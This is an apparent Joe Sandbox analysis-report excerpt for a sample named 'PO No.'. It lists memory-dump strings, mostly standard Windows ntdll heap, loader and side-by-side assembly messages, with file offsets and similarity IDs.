                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                            • API String ID: 0-1700792311
                                                            Strings
                                                            • VerifierDlls, xrefs: 01018CBD
                                                            • VerifierDebug, xrefs: 01018CA5
                                                            • VerifierFlags, xrefs: 01018C50
                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01018A3D
                                                            • HandleTraces, xrefs: 01018C8F
                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01018A67
                                                            • AVRF: -*- final list of providers -*- , xrefs: 01018B8F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                            • API String ID: 0-3223716464
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                            • API String ID: 0-1109411897
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-523794902
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                            • API String ID: 0-4098886588
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                            • API String ID: 0-122214566
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-792281065
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ie$N$Ie%I$VUUU$[$gfff$p
                                                            • API String ID: 0-3953077281
                                                            Strings
                                                            • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 0100276F
                                                            • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 0100279C
                                                            • \WinSxS\, xrefs: 00FC2E23
                                                            • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 01002706
                                                            • .Local\, xrefs: 00FC2D91
                                                            • @, xrefs: 00FC2E4D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                            • API String ID: 0-3926108909
                                                            Strings
                                                            • apphelp.dll, xrefs: 00F86496
                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00FE9A01
                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00FE99ED
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FE9A11, 00FE9A3A
                                                            • LdrpInitShimEngine, xrefs: 00FE99F4, 00FE9A07, 00FE9A30
                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00FE9A2A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-204845295
                                                            Strings
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01008181, 010081F5
                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 010081E5
                                                            • Loading import redirection DLL: '%wZ', xrefs: 01008170
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FCC6C3
                                                            • LdrpInitializeProcess, xrefs: 00FCC6C4
                                                            • LdrpInitializeImportRedirection, xrefs: 01008177, 010081EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                            • API String ID: 0-475462383
                                                            Strings
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01002178
                                                            • SXS: %s() passed the empty activation context, xrefs: 01002165
                                                            • RtlGetAssemblyStorageRoot, xrefs: 01002160, 0100219A, 010021BA
                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0100219F
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010021BF
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01002180
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                            • API String ID: 0-861424205
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                            • API String ID: 0-3393094623
                                                            APIs
                                                              • Part of subcall function 00FD2DF0: LdrInitializeThunk.NTDLL ref: 00FD2DFA
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0BA3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0BB6
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0D60
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0D74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                            • String ID:
                                                            • API String ID: 1404860816-0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                            • API String ID: 0-2518169356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                            • API String ID: 0-3178619729
                                                            Strings
                                                            • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 00FF7D56
                                                            • SsHd, xrefs: 00FAA885
                                                            • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 00FF7D39
                                                            • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 00FF7D03
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                            Strings
                                                            • @, xrefs: 00FC8591
                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00FC855E
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FC8421
                                                            • LdrpInitializeProcess, xrefs: 00FC8422
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • HEAP: , xrefs: 00FF54E0, 00FF55A1
                                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00FF54ED
                                                            • HEAP[%wZ]: , xrefs: 00FF54D1, 00FF5592
                                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00FF55AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                            Strings
                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010021D9, 010022B1
                                                            • SXS: %s() passed the empty activation context, xrefs: 010021DE
                                                            • .Local, xrefs: 00FC28D8
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010022B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: VUUU$^$gfff$gfff
                                                            Strings
                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0100342A
                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01003456
                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01003437
                                                            • RtlDeactivateActivationContext, xrefs: 01003425, 01003432, 01003451
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                            Strings
                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FF0FE5
                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FF1028
                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FF10AE
                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FF106B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                            Strings
                                                            • apphelp.dll, xrefs: 00FB2462
                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FFA992
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FFA9A2
                                                            • LdrpDynamicShimModule, xrefs: 00FFA998
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • HEAP: , xrefs: 00FA3264
                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00FA327D
                                                            • HEAP[%wZ]: , xrefs: 00FA3255
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                            Strings
                                                            • HEAP: , xrefs: 00F91596
                                                            • HEAP[%wZ]: , xrefs: 00F91712
                                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00F91728
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $@
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                            Strings
                                                            • LdrpCheckModule, xrefs: 00FFA117
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FFA121
                                                            • Failed to allocated memory for shimmed module list, xrefs: 00FFA10F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                            Strings
                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 010082DE
                                                            • Failed to reallocate the system dirs string !, xrefs: 010082D7
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 010082E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0104C1C5
                                                            • PreferredUILanguages, xrefs: 0104C212
                                                            • @, xrefs: 0104C1F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                            • API String ID: 0-2968386058
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                            • API String ID: 0-1373925480
                                                            Strings
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01014899
                                                            • LdrpCheckRedirection, xrefs: 0101488F
                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01014888
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                            • API String ID: 0-3154609507
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-2558761708
                                                            Strings
                                                            • Process initialization failed with status 0x%08lx, xrefs: 010120F3
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01012104
                                                            • LdrpInitializationFailure, xrefs: 010120FA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2986994758
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: #%u
                                                            • API String ID: 48624451-232158463
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@
                                                            • API String ID: 0-149943524
                                                            Strings
                                                            • LdrResSearchResource Enter, xrefs: 00F9AA13
                                                            • LdrResSearchResource Exit, xrefs: 00F9AA25
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                            • API String ID: 0-4066393604
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `$`
                                                            • API String ID: 0-197956300
                                                            Strings
                                                            • Failed to retrieve service checksum., xrefs: 00FEEE56
                                                            • ResIdCount less than 2., xrefs: 00FEEEC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                            • API String ID: 0-863616075
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Legacy$UEFI
                                                            • API String ID: 2994545307-634100481
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$MUI
                                                            • API String ID: 0-17815947
                                                            Strings
                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F9063D
                                                            • kLsE, xrefs: 00F90540
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
